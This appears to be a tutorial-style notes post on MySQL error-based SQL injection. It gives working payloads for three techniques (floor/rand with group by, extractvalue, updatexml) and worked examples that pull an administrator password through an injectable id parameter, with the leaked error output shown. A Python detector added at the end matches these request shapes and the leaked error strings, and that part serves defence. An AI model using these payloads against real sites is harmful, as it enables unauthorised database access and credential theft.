Posting some of my old notes. When MySQL fails to execute a statement it throws an error message, and PHP+MySQL sites often print that error text straight onto the page, so specific data can be extracted by constructing queries in the following three ways.
Actual test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()
The following payloads can be used (the first one was missing its opening parenthesis in the original notes; it is written here as it is used in the examples below):

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version was disclosed in the error text (the trailing "1" is the floor(rand(0)*2) digit that concat() appended to the value). To retrieve other data, replace the version() expression with the subquery you want.
For example, to query the administrator's username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
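All three techniques only work because the application echoes the MySQL error text to the client, so a defender can catch them on both sides: the request carries one of the three function shapes, and the response carries one of two very specific MySQL error strings. The following detector is an added example written for these notes, not code from the original post; the request and response samples are constructed, not captured from a real site.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures for the three error-based shapes described in the notes.
# floor/rand needs a GROUP BY somewhere in the value (either order), so two lookaheads are used.
REQUEST_SIGNATURES = {
    "floor_rand_groupby": re.compile(
        r"^(?=.*floor\s*\(\s*rand\s*\([^)]*\)\s*\*\s*2\s*\))(?=.*\bgroup\s+by\b)", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# Response-side signatures: the exact MySQL error texts these techniques produce when
# the page leaks them. Group 1 captures the value that was disclosed to the client.
RESPONSE_SIGNATURES = {
    "duplicate_group_key": re.compile(r"Duplicate entry '([^']*)' for key 'group_key'"),
    "xpath_syntax_error": re.compile(r"XPATH syntax error: '([^']*)'"),
}

def normalise(raw):
    """URL-decode a parameter value, drop /* */ comments and collapse whitespace."""
    text = unquote_plus(raw)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text)

def classify_request(raw):
    """Return the names of the error-based signatures present in one parameter value."""
    text = normalise(raw)
    return [name for name, pat in REQUEST_SIGNATURES.items() if pat.search(text)]

def classify_response(body):
    """Return (signature, disclosed_value) pairs for leaked MySQL errors in a response body."""
    hits = []
    for name, pat in RESPONSE_SIGNATURES.items():
        m = pat.search(body)
        if m:
            hits.append((name, m.group(1)))
    return hits

# Constructed samples: a benign id value, the three shapes from the notes, and two leaked errors.
SAMPLE_REQUESTS = [
    "1",
    "1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a)",
    "1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201)))",
    "1 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))",
]
SAMPLE_RESPONSES = [
    "<html><body>Article not found</body></html>",
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
]
```

The response-side check doubles as an incident-response aid: the captured group is exactly what the attacker read off the page, so it tells you which values were exposed (remember that the duplicate-key value carries the extra floor(rand()) digit at the end).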
All thanks to the foreign guys.